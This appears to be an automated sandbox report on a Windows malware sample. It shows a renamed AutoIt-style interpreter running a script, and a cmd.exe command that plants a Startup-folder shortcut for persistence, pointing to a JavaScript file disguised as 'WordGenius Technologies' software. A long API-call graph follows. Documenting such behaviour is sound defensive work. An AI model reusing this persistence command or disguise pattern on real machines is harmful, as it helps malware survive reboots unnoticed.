                                                                      Imagebase:0x7ff788560000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:2
                                                                      Start time:15:29:58
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:15:30:06
                                                                      Start date:07/10/2024
                                                                      Path:C:\Users\Public\InformationCheck.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3
                                                                      Imagebase:0x530000
                                                                      File size:893'608 bytes
                                                                      MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 3%, ReversingLabs
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:4
                                                                      Start time:15:30:09
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
                                                                      Imagebase:0x240000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:5
                                                                      Start time:15:30:09
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:7
                                                                      Start time:15:30:20
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\System32\wscript.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
                                                                      Imagebase:0x7ff7e48a0000
                                                                      File size:170'496 bytes
                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:10
                                                                      Start time:15:30:23
                                                                      Start date:07/10/2024
                                                                      Path:C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
                                                                      Imagebase:0x8a0000
                                                                      File size:893'608 bytes
                                                                      MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 3%, ReversingLabs
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:2.4%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:12.4%
                                                                        Total number of Nodes:1429
                                                                        Total number of Limit Nodes:30
                                                                        execution_graph 95207 7ff6bb145328 95230 7ff6bb144cac 95207->95230 95210 7ff6bb145474 95262 7ff6bb1457e4 7 API calls 2 library calls 95210->95262 95211 7ff6bb145344 95213 7ff6bb14547e 95211->95213 95216 7ff6bb145362 95211->95216 95263 7ff6bb1457e4 7 API calls 2 library calls 95213->95263 95215 7ff6bb145489 abort 95217 7ff6bb145387 95216->95217 95222 7ff6bb1453a4 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 95216->95222 95238 7ff6bb15ada4 95216->95238 95219 7ff6bb14540d 95245 7ff6bb145930 95219->95245 95221 7ff6bb145412 95248 7ff6bb123730 95221->95248 95222->95219 95259 7ff6bb149204 35 API calls FindHandler 95222->95259 95227 7ff6bb145435 95227->95215 95261 7ff6bb144e90 8 API calls 2 library calls 95227->95261 95229 7ff6bb14544c 95229->95217 95231 7ff6bb144cce __scrt_initialize_crt 95230->95231 95264 7ff6bb1465ec 95231->95264 95236 7ff6bb144cd7 95236->95210 95236->95211 95239 7ff6bb15adff 95238->95239 95240 7ff6bb15ade0 95238->95240 95239->95222 95240->95239 95313 7ff6bb1210e8 95240->95313 95318 7ff6bb121064 95240->95318 95323 7ff6bb121048 95240->95323 95328 7ff6bb121080 95240->95328 95592 7ff6bb146240 95245->95592 95247 7ff6bb145947 GetStartupInfoW 95247->95221 95249 7ff6bb1237a3 95248->95249 95250 7ff6bb123743 IsThemeActive 95248->95250 95260 7ff6bb145974 GetModuleHandleW 95249->95260 95594 7ff6bb1492d0 95250->95594 95256 7ff6bb12377d 95606 7ff6bb1237b0 95256->95606 95259->95219 95260->95227 95261->95229 95262->95213 95263->95215 95265 7ff6bb1465f5 __vcrt_initialize_winapi_thunks __vcrt_initialize 95264->95265 95277 7ff6bb147290 95265->95277 95268 7ff6bb144cd3 95268->95236 95272 7ff6bb15ac84 95268->95272 95270 7ff6bb14660c 95270->95268 95284 7ff6bb1472d8 DeleteCriticalSection 95270->95284 95273 7ff6bb164340 95272->95273 95274 7ff6bb144ce0 95273->95274 95301 7ff6bb15dd2c 95273->95301 95274->95236 95276 7ff6bb146620 8 API calls 3 library calls 95274->95276 95276->95236 95278 7ff6bb147298 95277->95278 95280 7ff6bb1472c9 95278->95280 95281 7ff6bb1465ff 95278->95281 95285 7ff6bb147614 95278->95285 95290 7ff6bb1472d8 DeleteCriticalSection 95280->95290 95281->95268 95283 7ff6bb147218 8 API calls 3 library calls 95281->95283 95283->95270 95284->95268 95291 7ff6bb147310 95285->95291 95288 7ff6bb14765f InitializeCriticalSectionAndSpinCount 95289 7ff6bb147654 95288->95289 95289->95278 95290->95281 95292 7ff6bb147371 95291->95292 95298 7ff6bb14736c try_get_function 95291->95298 95292->95288 95292->95289 95293 7ff6bb147454 95293->95292 95296 7ff6bb147462 GetProcAddress 95293->95296 95294 7ff6bb1473a0 LoadLibraryExW 95295 7ff6bb1473c1 GetLastError 95294->95295 95294->95298 95295->95298 95297 7ff6bb147473 95296->95297 95297->95292 95298->95292 95298->95293 95298->95294 95299 7ff6bb147439 FreeLibrary 95298->95299 95300 7ff6bb1473fb LoadLibraryExW 95298->95300 95299->95298 95300->95298 95312 7ff6bb15b9bc EnterCriticalSection 95301->95312 95303 7ff6bb15dd3c 95304 7ff6bb15e258 32 API calls 95303->95304 95305 7ff6bb15dd45 95304->95305 95306 7ff6bb15dd53 95305->95306 95307 7ff6bb15db44 34 API calls 95305->95307 95308 7ff6bb15ba10 _isindst LeaveCriticalSection 95306->95308 95309 7ff6bb15dd4e 95307->95309 95310 7ff6bb15dd5f 95308->95310 95311 7ff6bb15dc30 GetStdHandle GetFileType 95309->95311 95310->95273 95311->95306 95333 7ff6bb141d80 95313->95333 95317 7ff6bb144f15 95317->95240 95390 7ff6bb127ec0 95318->95390 95320 7ff6bb12106d 95426 7ff6bb144ebc 34 API calls _onexit 95320->95426 95322 7ff6bb144f15 95322->95240 95489 7ff6bb127718 95323->95489 95327 7ff6bb144f15 95327->95240 95508 7ff6bb127920 95328->95508 95330 7ff6bb12109e 95538 7ff6bb144ebc 34 API calls _onexit 95330->95538 95332 7ff6bb144f15 95332->95240 95356 7ff6bb129640 95333->95356 95335 7ff6bb141db2 GetVersionExW 95359 7ff6bb127cf4 95335->95359 95337 7ff6bb12dda4 4 API calls 95338 7ff6bb141dfc 95337->95338 95338->95337 95339 7ff6bb141e87 95338->95339 95369 7ff6bb12dda4 95339->95369 95341 7ff6bb141ea4 95342 7ff6bb189645 95341->95342 95343 7ff6bb141f3c GetCurrentProcess IsWow64Process 95341->95343 95344 7ff6bb18964f 95342->95344 95345 7ff6bb141f7e memcpy_s 95343->95345 95373 7ff6bb1932f4 LoadLibraryA GetProcAddress 95344->95373 95345->95344 95347 7ff6bb141f86 GetSystemInfo 95345->95347 95349 7ff6bb1210f1 95347->95349 95348 7ff6bb1896b1 95350 7ff6bb1896b5 95348->95350 95351 7ff6bb1896d7 GetSystemInfo 95348->95351 95355 7ff6bb144ebc 34 API calls _onexit 95349->95355 95374 7ff6bb1932f4 LoadLibraryA GetProcAddress 95350->95374 95353 7ff6bb1896bf 95351->95353 95353->95349 95354 7ff6bb1896f0 FreeLibrary 95353->95354 95354->95349 95355->95317 95375 7ff6bb144c68 95356->95375 95358 7ff6bb129663 95358->95335 95360 7ff6bb16d2c8 95359->95360 95361 7ff6bb127d0d 95359->95361 95362 7ff6bb12dda4 4 API calls 95360->95362 95364 7ff6bb127d24 95361->95364 95367 7ff6bb127d51 95361->95367 95363 7ff6bb16d2d3 95362->95363 95384 7ff6bb127e4c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95364->95384 95366 7ff6bb127d2f memcpy_s 95366->95338 95367->95363 95368 7ff6bb144c68 4 API calls 95367->95368 95368->95366 95370 7ff6bb12dda9 95369->95370 95371 7ff6bb12ddc7 memcpy_s 95369->95371 95370->95371 95385 7ff6bb12a7c0 95370->95385 95371->95341 95371->95371 95373->95348 95374->95353 95380 7ff6bb144c2c 95375->95380 95376 7ff6bb144c50 95376->95358 95380->95375 95380->95376 95381 7ff6bb14925c EnterCriticalSection LeaveCriticalSection fread_s 95380->95381 95382 7ff6bb145600 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 95380->95382 95383 7ff6bb145620 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 95380->95383 95381->95380 95383->95380 95384->95366 95387 7ff6bb12a7ed 95385->95387 95389 7ff6bb12a7dd memcpy_s 95385->95389 95386 7ff6bb16e7da 95387->95386 95388 7ff6bb144c68 4 API calls 95387->95388 95388->95389 95389->95371 95427 7ff6bb1282b4 95390->95427 95393 7ff6bb1282b4 4 API calls 95394 7ff6bb127f3a 95393->95394 95395 7ff6bb129640 4 API calls 95394->95395 95396 7ff6bb127f46 95395->95396 95397 7ff6bb127cf4 4 API calls 95396->95397 95398 7ff6bb127f59 95397->95398 95434 7ff6bb142d5c 6 API calls 95398->95434 95400 7ff6bb127fa5 95401 7ff6bb129640 4 API calls 95400->95401 95402 7ff6bb127fb1 95401->95402 95403 7ff6bb129640 4 API calls 95402->95403 95404 7ff6bb127fbd 95403->95404 95405 7ff6bb129640 4 API calls 95404->95405 95406 7ff6bb127fc9 95405->95406 95407 7ff6bb129640 4 API calls 95406->95407 95408 7ff6bb12800f 95407->95408 95409 7ff6bb129640 4 API calls 95408->95409 95410 7ff6bb1280f7 95409->95410 95435 7ff6bb13ef88 95410->95435 95412 7ff6bb128103 95442 7ff6bb13eec8 95412->95442 95414 7ff6bb12812f 95415 7ff6bb129640 4 API calls 95414->95415 95416 7ff6bb12813b 95415->95416 95453 7ff6bb136d40 95416->95453 95420 7ff6bb1281ac 95421 7ff6bb1281be GetStdHandle 95420->95421 95422 7ff6bb128220 OleInitialize 95421->95422 95423 7ff6bb16d350 95421->95423 95422->95320 95470 7ff6bb19ffc8 CreateThread 95423->95470 95425 7ff6bb16d367 CloseHandle 95426->95322 95428 7ff6bb129640 4 API calls 95427->95428 95429 7ff6bb1282c6 95428->95429 95430 7ff6bb129640 4 API calls 95429->95430 95431 7ff6bb1282cf 95430->95431 95432 7ff6bb129640 4 API calls 95431->95432 95433 7ff6bb127f2e 95432->95433 95433->95393 95434->95400 95436 7ff6bb129640 4 API calls 95435->95436 95437 7ff6bb13efa3 95436->95437 95438 7ff6bb129640 4 API calls 95437->95438 95439 7ff6bb13efac 95438->95439 95440 7ff6bb129640 4 API calls 95439->95440 95441 7ff6bb13f02e 95440->95441 95441->95412 95443 7ff6bb13eede 95442->95443 95444 7ff6bb129640 4 API calls 95443->95444 95445 7ff6bb13eeea 95444->95445 95446 7ff6bb129640 4 API calls 95445->95446 95447 7ff6bb13eef6 95446->95447 95448 7ff6bb129640 4 API calls 95447->95448 95449 7ff6bb13ef02 95448->95449 95450 7ff6bb129640 4 API calls 95449->95450 95451 7ff6bb13ef0e 95450->95451 95452 7ff6bb13ef68 RegisterWindowMessageW 95451->95452 95452->95414 95454 7ff6bb136db9 95453->95454 95455 7ff6bb136d80 95453->95455 95471 7ff6bb145114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95454->95471 95462 7ff6bb12816b 95455->95462 95472 7ff6bb145114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95455->95472 95463 7ff6bb1439a8 95462->95463 95464 7ff6bb18a502 95463->95464 95469 7ff6bb1439cc 95463->95469 95473 7ff6bb12ee20 95464->95473 95466 7ff6bb18a50e 95467 7ff6bb12ee20 18 API calls 95466->95467 95468 7ff6bb18a52d 95467->95468 95469->95420 95470->95425 95474 7ff6bb12ee3a 95473->95474 95481 7ff6bb12ee78 Concurrency::wait 95473->95481 95475 7ff6bb12ee42 Concurrency::wait 95474->95475 95476 7ff6bb12eeac 95474->95476 95478 7ff6bb17a6db 95475->95478 95480 7ff6bb12ee5d 95475->95480 95475->95481 95483 7ff6bb12e0a8 95476->95483 95479 7ff6bb17a68a VariantClear 95478->95479 95478->95481 95479->95481 95480->95481 95487 7ff6bb18b46c 15 API calls 95480->95487 95481->95466 95484 7ff6bb12e0b6 95483->95484 95485 7ff6bb12e0bb 95483->95485 95488 7ff6bb12f0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95484->95488 95485->95481 95487->95481 95488->95485 95490 7ff6bb129640 4 API calls 95489->95490 95491 7ff6bb12778f 95490->95491 95497 7ff6bb126f24 95491->95497 95494 7ff6bb12782c 95495 7ff6bb121051 95494->95495 95500 7ff6bb127410 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95494->95500 95496 7ff6bb144ebc 34 API calls _onexit 95495->95496 95496->95327 95501 7ff6bb126f60 95497->95501 95500->95494 95502 7ff6bb126f85 95501->95502 95504 7ff6bb126f52 95501->95504 95503 7ff6bb126f93 RegOpenKeyExW 95502->95503 95502->95504 95503->95504 95505 7ff6bb126faf RegQueryValueExW 95503->95505 95504->95494 95506 7ff6bb126fdd 95505->95506 95507 7ff6bb126ff5 RegCloseKey 95505->95507 95506->95507 95507->95504 95509 7ff6bb127948 wcsftime 95508->95509 95510 7ff6bb129640 4 API calls 95509->95510 95511 7ff6bb127a02 95510->95511 95539 7ff6bb125680 95511->95539 95513 7ff6bb127a0c 95546 7ff6bb143a38 95513->95546 95517 7ff6bb127a2c 95562 7ff6bb124680 95517->95562 95519 7ff6bb127a3d 95520 7ff6bb129640 4 API calls 95519->95520 95521 7ff6bb127a47 95520->95521 95566 7ff6bb12a854 95521->95566 95524 7ff6bb16d05c RegQueryValueExW 95525 7ff6bb16d131 RegCloseKey 95524->95525 95526 7ff6bb16d08f 95524->95526 95529 7ff6bb127a83 Concurrency::wait 95525->95529 95533 7ff6bb16d147 wcscat Concurrency::wait 95525->95533 95527 7ff6bb144c68 4 API calls 95526->95527 95528 7ff6bb16d0b2 95527->95528 95530 7ff6bb16d0bf RegQueryValueExW 95528->95530 95529->95330 95531 7ff6bb16d0f3 95530->95531 95534 7ff6bb16d112 95530->95534 95532 7ff6bb127cf4 4 API calls 95531->95532 95532->95534 95533->95529 95536 7ff6bb124680 4 API calls 95533->95536 95537 7ff6bb129d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95533->95537 95570 7ff6bb12ec00 95533->95570 95534->95525 95536->95533 95537->95533 95538->95332 95575 7ff6bb168f90 95539->95575 95542 7ff6bb12ec00 4 API calls 95543 7ff6bb1256b4 95542->95543 95577 7ff6bb1256d4 95543->95577 95545 7ff6bb1256c1 Concurrency::wait 95545->95513 95547 7ff6bb168f90 wcsftime 95546->95547 95548 7ff6bb143a44 GetFullPathNameW 95547->95548 95549 7ff6bb143a74 95548->95549 95550 7ff6bb127cf4 4 API calls 95549->95550 95551 7ff6bb127a1b 95550->95551 95552 7ff6bb1271f8 95551->95552 95553 7ff6bb12721c 95552->95553 95556 7ff6bb16cd0c 95552->95556 95554 7ff6bb127274 95553->95554 95559 7ff6bb16cd66 memcpy_s 95553->95559 95587 7ff6bb12b960 95554->95587 95558 7ff6bb144c68 4 API calls 95556->95558 95557 7ff6bb127283 memcpy_s 95557->95517 95558->95559 95560 7ff6bb144c68 4 API calls 95559->95560 95561 7ff6bb16cdda memcpy_s 95560->95561 95563 7ff6bb12469f 95562->95563 95565 7ff6bb1246c8 memcpy_s 95562->95565 95564 7ff6bb144c68 4 API calls 95563->95564 95564->95565 95565->95519 95567 7ff6bb127a51 RegOpenKeyExW 95566->95567 95568 7ff6bb12a87a 95566->95568 95567->95524 95567->95529 95569 7ff6bb144c68 4 API calls 95568->95569 95569->95567 95571 7ff6bb12ec1d 95570->95571 95572 7ff6bb17a5a2 95571->95572 95573 7ff6bb144c68 4 API calls 95571->95573 95574 7ff6bb12ec55 memcpy_s 95573->95574 95574->95533 95576 7ff6bb12568c GetModuleFileNameW 95575->95576 95576->95542 95578 7ff6bb168f90 wcsftime 95577->95578 95579 7ff6bb1256e9 GetFullPathNameW 95578->95579 95580 7ff6bb16c03a 95579->95580 95581 7ff6bb125712 95579->95581 95582 7ff6bb12a854 4 API calls 95580->95582 95583 7ff6bb127cf4 4 API calls 95581->95583 95584 7ff6bb12571c 95582->95584 95583->95584 95584->95584 95585 7ff6bb12dda4 4 API calls 95584->95585 95586 7ff6bb125785 95585->95586 95586->95545 95588 7ff6bb12b981 95587->95588 95591 7ff6bb12b976 memcpy_s 95587->95591 95589 7ff6bb144c68 4 API calls 95588->95589 95590 7ff6bb16ef2a 95588->95590 95589->95591 95591->95557 95593 7ff6bb146220 95592->95593 95593->95247 95593->95593 95654 7ff6bb15b9bc EnterCriticalSection 95594->95654 95596 7ff6bb1492e4 95597 7ff6bb15ba10 _isindst LeaveCriticalSection 95596->95597 95598 7ff6bb12376e 95597->95598 95599 7ff6bb149334 95598->95599 95600 7ff6bb14933d 95599->95600 95601 7ff6bb123778 95599->95601 95655 7ff6bb1555d4 15 API calls memcpy_s 95600->95655 95605 7ff6bb1236e8 SystemParametersInfoW SystemParametersInfoW 95601->95605 95603 7ff6bb149342 95656 7ff6bb15b164 31 API calls _invalid_parameter_noinfo 95603->95656 95605->95256 95607 7ff6bb1237cd wcsftime 95606->95607 95608 7ff6bb129640 4 API calls 95607->95608 95609 7ff6bb1237dd GetCurrentDirectoryW 95608->95609 95657 7ff6bb1257a0 95609->95657 95611 7ff6bb123807 IsDebuggerPresent 95612 7ff6bb16b872 MessageBoxA 95611->95612 95613 7ff6bb123815 95611->95613 95614 7ff6bb16b894 95612->95614 95613->95614 95615 7ff6bb123839 95613->95615 95771 7ff6bb12e278 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95614->95771 95731 7ff6bb123f04 95615->95731 95619 7ff6bb123860 GetFullPathNameW 95620 7ff6bb127cf4 4 API calls 95619->95620 95621 7ff6bb1238a6 95620->95621 95747 7ff6bb123f9c 95621->95747 95622 7ff6bb1239e4 15 API calls 95624 7ff6bb16b8dc SetCurrentDirectoryW 95622->95624 95626 7ff6bb1238c7 95624->95626 95625 7ff6bb1238bf 95625->95622 95625->95626 95627 7ff6bb1238d0 95626->95627 95772 7ff6bb18d540 AllocateAndInitializeSid CheckTokenMembership FreeSid 95626->95772 95763 7ff6bb123b84 7 API calls 95627->95763 95630 7ff6bb16b8f8 95630->95627 95633 7ff6bb16b90c 95630->95633 95635 7ff6bb125680 6 API calls 95633->95635 95634 7ff6bb1238da 95637 7ff6bb126258 46 API calls 95634->95637 95639 7ff6bb1238ef 95634->95639 95636 7ff6bb16b916 95635->95636 95638 7ff6bb12ec00 4 API calls 95636->95638 95637->95639 95641 7ff6bb16b927 95638->95641 95640 7ff6bb123913 95639->95640 95643 7ff6bb125d88 Shell_NotifyIconW 95639->95643 95767 7ff6bb1239e4 95640->95767 95642 7ff6bb16b930 95641->95642 95646 7ff6bb16b94d 95641->95646 95645 7ff6bb1271f8 4 API calls 95642->95645 95643->95640 95648 7ff6bb16b93c 95645->95648 95649 7ff6bb1271f8 4 API calls 95646->95649 95773 7ff6bb127c24 95648->95773 95652 7ff6bb16b963 GetForegroundWindow ShellExecuteW 95649->95652 95653 7ff6bb16b99f Concurrency::wait 95652->95653 95653->95640 95655->95603 95656->95601 95658 7ff6bb129640 4 API calls 95657->95658 95659 7ff6bb1257d7 95658->95659 95782 7ff6bb129bbc 95659->95782 95661 7ff6bb1257fe 95662 7ff6bb125680 6 API calls 95661->95662 95663 7ff6bb125812 95662->95663 95664 7ff6bb12ec00 4 API calls 95663->95664 95665 7ff6bb125823 95664->95665 95796 7ff6bb126460 95665->95796 95668 7ff6bb12584e Concurrency::wait 95673 7ff6bb12e0a8 4 API calls 95668->95673 95669 7ff6bb16c05e 95869 7ff6bb1a2948 95669->95869 95671 7ff6bb16c074 95672 7ff6bb16c081 95671->95672 95674 7ff6bb12652c 63 API calls 95671->95674 95887 7ff6bb12652c 95672->95887 95675 7ff6bb12586a 95673->95675 95674->95672 95677 7ff6bb12ec00 4 API calls 95675->95677 95678 7ff6bb125888 95677->95678 95682 7ff6bb16c099 95678->95682 95822 7ff6bb12eff8 95678->95822 95680 7ff6bb1258ad Concurrency::wait 95681 7ff6bb12ec00 4 API calls 95680->95681 95683 7ff6bb1258d7 95681->95683 95685 7ff6bb125ab4 4 API calls 95682->95685 95683->95682 95684 7ff6bb12eff8 46 API calls 95683->95684 95687 7ff6bb1258fc Concurrency::wait 95684->95687 95686 7ff6bb16c0e1 95685->95686 95688 7ff6bb125ab4 4 API calls 95686->95688 95690 7ff6bb129640 4 API calls 95687->95690 95689 7ff6bb16c103 95688->95689 95693 7ff6bb125680 6 API calls 95689->95693 95691 7ff6bb12591f 95690->95691 95835 7ff6bb125ab4 95691->95835 95695 7ff6bb16c12b 95693->95695 95698 7ff6bb125ab4 4 API calls 95695->95698 95697 7ff6bb125941 95697->95682 95699 7ff6bb125949 95697->95699 95700 7ff6bb16c139 95698->95700 95702 7ff6bb148e28 wcsftime 37 API calls 95699->95702 95701 7ff6bb12e0a8 4 API calls 95700->95701 95703 7ff6bb16c14a 95701->95703 95704 7ff6bb125958 95702->95704 95705 7ff6bb125ab4 4 API calls 95703->95705 95704->95686 95706 7ff6bb125960 95704->95706 95707 7ff6bb16c15b 95705->95707 95708 7ff6bb148e28 wcsftime 37 API calls 95706->95708 95711 7ff6bb12e0a8 4 API calls 95707->95711 95709 7ff6bb12596f 95708->95709 95709->95689 95710 7ff6bb125977 95709->95710 95712 7ff6bb148e28 wcsftime 37 API calls 95710->95712 95713 7ff6bb16c172 95711->95713 95714 7ff6bb125986 95712->95714 95715 7ff6bb125ab4 4 API calls 95713->95715 95716 7ff6bb1259c6 95714->95716 95719 7ff6bb125ab4 4 API calls 95714->95719 95718 7ff6bb16c183 95715->95718 95716->95707 95717 7ff6bb1259d3 95716->95717 95858 7ff6bb12df90 95717->95858 95720 7ff6bb1259a8 95719->95720 95721 7ff6bb12e0a8 4 API calls 95720->95721 95723 7ff6bb1259b5 95721->95723 95725 7ff6bb125ab4 4 API calls 95723->95725 95725->95716 95727 7ff6bb12d670 18 API calls 95728 7ff6bb125a12 95727->95728 95728->95727 95729 7ff6bb125ab4 4 API calls 95728->95729 95730 7ff6bb125a60 Concurrency::wait 95728->95730 95729->95728 95730->95611 95732 7ff6bb123f29 wcsftime 95731->95732 95733 7ff6bb16ba2c memcpy_s 95732->95733 95734 7ff6bb123f4b 95732->95734 95737 7ff6bb16ba4d GetOpenFileNameW 95733->95737 95735 7ff6bb1256d4 5 API calls 95734->95735 95736 7ff6bb123f56 95735->95736 96188 7ff6bb123eb4 95736->96188 95739 7ff6bb123858 95737->95739 95740 7ff6bb16bab0 95737->95740 95739->95619 95739->95625 95742 7ff6bb127cf4 4 API calls 95740->95742 95744 7ff6bb16babc 95742->95744 95745 7ff6bb123f6c 96206 7ff6bb126394 95745->96206 95748 7ff6bb123fb6 wcsftime 95747->95748 96260 7ff6bb129734 95748->96260 95750 7ff6bb123fc4 95762 7ff6bb124050 95750->95762 96270 7ff6bb124d28 77 API calls 95750->96270 95752 7ff6bb123fd3 95752->95762 96271 7ff6bb124b0c 79 API calls Concurrency::wait 95752->96271 95754 7ff6bb123fe0 95755 7ff6bb123fe8 GetFullPathNameW 95754->95755 95754->95762 95756 7ff6bb127cf4 4 API calls 95755->95756 95757 7ff6bb124014 95756->95757 95758 7ff6bb127cf4 4 API calls 95757->95758 95759 7ff6bb124028 95758->95759 95760 7ff6bb16bac2 wcscat 95759->95760 95761 7ff6bb127cf4 4 API calls 95759->95761 95761->95762 95762->95625 96273 7ff6bb123d90 7 API calls 95763->96273 95765 7ff6bb1238d5 95766 7ff6bb123cbc CreateWindowExW CreateWindowExW ShowWindow ShowWindow 95765->95766 95768 7ff6bb1239ff 95767->95768 95769 7ff6bb123a41 Concurrency::wait 95768->95769 96274 7ff6bb123b20 95768->96274 95769->95769 95771->95625 95772->95630 95774 7ff6bb127c36 95773->95774 95775 7ff6bb16d21e 95773->95775 96290 7ff6bb127c48 95774->96290 96298 7ff6bb14364c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95775->96298 95778 7ff6bb127c42 95778->95646 95779 7ff6bb16d22b 95780 7ff6bb12e0a8 4 API calls 95779->95780 95781 7ff6bb16d236 Concurrency::wait 95780->95781 95783 7ff6bb129be5 wcsftime 95782->95783 95784 7ff6bb127cf4 4 API calls 95783->95784 95785 7ff6bb129c1b 95783->95785 95784->95785 95795 7ff6bb129c4a Concurrency::wait 95785->95795 95893 7ff6bb129d84 95785->95893 95787 7ff6bb129d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95787->95795 95788 7ff6bb12ec00 4 API calls 95790 7ff6bb129d4a 95788->95790 95789 7ff6bb129d57 Concurrency::wait 95789->95661 95792 7ff6bb124680 4 API calls 95790->95792 95791 7ff6bb12ec00 4 API calls 95791->95795 95792->95789 95793 7ff6bb124680 4 API calls 95793->95795 95794 7ff6bb129d21 95794->95788 95794->95789 95795->95787 95795->95791 95795->95793 95795->95794 95896 7ff6bb126d64 95796->95896 95799 7ff6bb12649d 95801 7ff6bb1264ba FreeLibrary 95799->95801 95802 7ff6bb1264c0 95799->95802 95800 7ff6bb126d64 2 API calls 95800->95799 95801->95802 95900 7ff6bb1548e0 95802->95900 95805 7ff6bb1264db LoadLibraryExW 95919 7ff6bb126cc4 95805->95919 95806 7ff6bb16c8f6 95807 7ff6bb12652c 63 API calls 95806->95807 95809 7ff6bb16c8fe 95807->95809 95811 7ff6bb126cc4 3 API calls 95809->95811 95814 7ff6bb16c907 95811->95814 95813 7ff6bb126505 95813->95814 95815 7ff6bb126512 95813->95815 95941 7ff6bb1267d8 95814->95941 95816 7ff6bb12652c 63 API calls 95815->95816 95818 7ff6bb125846 95816->95818 95818->95668 95818->95669 95821 7ff6bb16c93f 96144 7ff6bb131a30 95822->96144 95824 7ff6bb12f029 95825 7ff6bb17a7a8 95824->95825 95826 7ff6bb12f040 95824->95826 95827 7ff6bb12ee20 18 API calls 95825->95827 95829 7ff6bb144c68 4 API calls 95826->95829 95828 7ff6bb17a7bc 95827->95828 95830 7ff6bb12f066 95829->95830 95832 7ff6bb12f08f 95830->95832 96159 7ff6bb12f0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95830->96159 96155 7ff6bb12f1bc 95832->96155 95834 7ff6bb12f0c6 95834->95680 95836 7ff6bb125ac6 95835->95836 95837 7ff6bb125ae4 95835->95837 95838 7ff6bb12e0a8 4 API calls 95836->95838 95839 7ff6bb127cf4 4 API calls 95837->95839 95840 7ff6bb12592d 95838->95840 95839->95840 95841 7ff6bb148e28 95840->95841 95842 7ff6bb148ea4 95841->95842 95843 7ff6bb148e3f 95841->95843 96163 7ff6bb148d98 35 API calls _mbstowcs_s_l 95842->96163 95853 7ff6bb148e63 95843->95853 96161 7ff6bb1555d4 15 API calls memcpy_s 95843->96161 95846 7ff6bb148ed6 95848 7ff6bb148ee2 95846->95848 95857 7ff6bb148ef9 95846->95857 95847 7ff6bb148e49 96162 7ff6bb15b164 31 API calls _invalid_parameter_noinfo 95847->96162 96164 7ff6bb1555d4 15 API calls memcpy_s 95848->96164 95851 7ff6bb148e54 95851->95697 95852 7ff6bb148ee7 